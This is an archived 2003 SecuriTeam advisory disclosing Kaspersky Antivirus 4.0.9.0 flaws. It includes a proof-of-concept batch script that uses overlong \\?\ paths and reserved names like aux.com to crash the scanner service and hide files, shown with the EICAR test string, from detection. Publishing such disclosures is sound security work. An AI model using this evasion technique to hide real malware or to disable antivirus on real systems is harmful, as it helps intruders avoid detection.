[NT] Kaspersky Antivirus DoS (Long Path, AUX)

From: support@securiteam.com
Date: 02/15/03

  • Next message: support@securiteam.com: "[EXPL] RealServer 8 Remote Buffer Overflow Vulnerability (Exploit, SETUP, RTSP)"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 15 Feb 2003 21:48:18 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Kaspersky Antivirus DoS (Long Path, AUX)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.kaspersky.com/> Kaspersky Antivirus (KAV) is a family of
    antiviral products.

    A few vulnerabilities were identified in their products, the most serious
    one allows user to crash antiviral server remotely (write access to any
    directory on remote server is required).
    1. Long path crash
    2. Long path prevents malware from detection
    3. Special name prevents malware from detection

    DETAILS

    Vulnerable systems:
     * Kaspersky Antivirus version 4.0.9.0

    1. Long path crash
    NTFS file system allows creating paths of almost unlimited length.
    However, Windows API does not allow path longer than 256 bytes. To prevent
    Windows API from checking requested path \\?\ prefix may be used to
    filename. This is documented feature of Windows API. Paths longer than 256
    characters will cause KAV monitor service to crash or hang with 100% CPU
    usage. Possibility of code execution is not researched.

    2. Long path prevents malware from detection
    Long path will also prevent malware from detection by antiviral scanner.

    3. Special name prevents malware from detection
    It is possible to create NTFS file with name like aux.vbs or aux.com.
    Malware in this file will not be detected.

    Exploit:
    This .bat file demonstrates vulnerability.

    1,2 Long path crash & Long path prevents malware from detection
    @echo off
    SET
    A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    A
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
    echo
    X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com

    3. Special name prevents malware from detection

    echo
    X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\aux.com

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
    ZARAZA.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



    Relevant Pages